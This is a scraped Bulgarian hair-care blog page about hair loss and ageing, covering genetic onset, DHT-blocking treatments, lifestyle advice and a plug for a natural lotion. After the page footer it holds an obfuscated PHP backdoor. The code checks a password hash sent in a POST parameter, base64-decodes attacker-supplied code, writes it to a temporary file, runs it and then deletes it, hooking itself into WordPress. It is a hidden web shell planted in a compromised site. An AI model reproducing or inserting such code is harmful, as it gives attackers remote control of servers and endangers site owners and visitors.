Косопад и възраст – кога започва оплешивяването? | Косопад

Косопад при напредване на възрастта

Косопад и възраст

Голяма част от хората получават косопад с напредването на възрастта. В тези случаи е много трудно да се реагира, въпреки че това не е невъзможно. Специалисти обясняват, че оплешивяването в по – късните години на човешкия живот се дължи основно на гените и на цялостното изтощаване на организма.

На каква възраст може да се очаква поява на косопад?

Много трудно се прогнозира на каква възраст човек може да има проблеми с косата. В класическите случаи на генетичен косопад, той обичайно започва на около 30 години и се развива бурно до навършване на петдесет. При някои пациенти обаче олисяването започва още в края на пубертета и нищо не е в състояние да го спре. Независимо от всичко, най – важно е да се определи на какво се дължи оплешивяването, за да се вземат подходящите мерки.

Какво може да се направи при косопад заради възрастта?

Преди всичко трябва да потърсите консултация с експерт – дерматолог, който да определи на какво се дължи олисяването на скалпа. Той евентуално би могъл да назначи някакво лечение, или да ви даде полезни съвети. Също така може да изпробвате и някои от класическите методи на алтернативната медицина, като например изпитани рецепти при косопад или да поръчате изпитания и изцяло съставен от естествени продукти лосион срещу косопад „Ефект – 2“.

Косопад и дихидротестостерон (ДХТ)

Когато става въпрос за андрогенна алопеция (т. н. мъжки косопад, предизвикан от запушване на фоликулите от дихидротестостерон), е възможно да се използват препарати, които блокират преобразуването на мъжкия полов хормон тестостерон в ДХТ. Изключително важно е да се отбележи, че такива средства трябва да се вземат едва след завършване цялостното развитие на човека (след края на пубертета), защото някои от тях са много силни и могат да повлияят хормоналното развитие. Блокирането на ДХТ преди или по време на пубертета  е опасно.

Цялостен подход за превенция на косопад

Състоянието на косата е в пряка зависимост от кондицията на тялото като цяло. За да се предпазите, водете нормален и здравословен начин на живот. Това не значи, че трябва да се лишите от всички удоволствия на този свят, но просто не прекалявайте. Вредните храни, алкохолът, тютюнопушенето, стресът и обездвижването са сред най – честите причинители на косопад.

косопад и възраст

косопад и възраст

17. май 2013 23:11:33 от Косопад
Категории: Косопад – Статии | Етикети: , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}